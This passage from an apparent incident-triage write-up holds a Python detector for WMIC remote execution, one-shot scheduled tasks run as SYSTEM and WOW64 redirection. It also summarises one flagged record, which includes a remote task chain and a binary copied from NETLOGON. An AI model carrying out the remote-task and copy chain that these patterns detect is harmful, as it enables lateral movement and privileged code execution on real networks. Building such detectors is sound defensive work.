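        by_task.setdefault(task.lower(), set()).add(verb.lower())
    full_chain = [t for t, v in by_task.items() if {"create", "run", "delete"} <= v]
    copy = re.search(r'''copy\s+(\\\\[^\s'"&]+)\s+([^\s'"&]+)''', remote_command, re.I)
    destination = expand_windir(copy.group(2)) if copy else None
    return {
        "task": full_chain[0] if full_chain else None,
        "create_run_delete": bool(full_chain),
        "run_as_system": re.search(r"/RU\s+['\"]?system\b", remote_command, re.I) is not None,
        "on_logon": re.search(r"/SC\s+onlogon\b", remote_command, re.I) is not None,
        "source": copy.group(1) if copy else None,
        "destination": destination,
        # Where the copy really lands once cmd.exe has expanded the variable.
        "destination_dir": ntpath.dirname(destination) if destination else None,
    }


def wow64_redirected(proc):
    """Image under SysWOW64 while the command line asked for system32: WOW64
    file-system redirection, i.e. the process that launched it is 32-bit."""
    return ("\\syswow64\\" in proc["image"].lower()
            and "\\system32\\" in proc["cmdline"].lower())


def triage(processes):
    """Run the checks over a process list and return (pid, finding) pairs."""
    findings = []
    for proc in processes:
        if wow64_redirected(proc):
            findings.append((proc["pid"], "wow64-redirected"))
        remote = wmic_remote_exec(proc["cmdline"])
        if remote:
            findings.append((proc["pid"], "wmic-remote-exec"))
            chain = schtasks_one_shot(remote["remote_command"])
            if chain["create_run_delete"] and chain["run_as_system"]:
                findings.append((proc["pid"], "schtasks-one-shot-as-system"))
    return findings


if __name__ == "__main__":
    for pid, finding in triage(PROCESSES):
        print(pid, finding)
```

For the wmic record the parser returns node 0.0.0.0, user BioPlus.net\sqluser2 with a password on the command line, the task sz401 with all three verbs and /RU System, the source \\BioPlus.net\NETLOGON\weams.exe, and a destination that expands to C:\Windowslsamp.exe, whose directory is C:\ rather than C:\Windows.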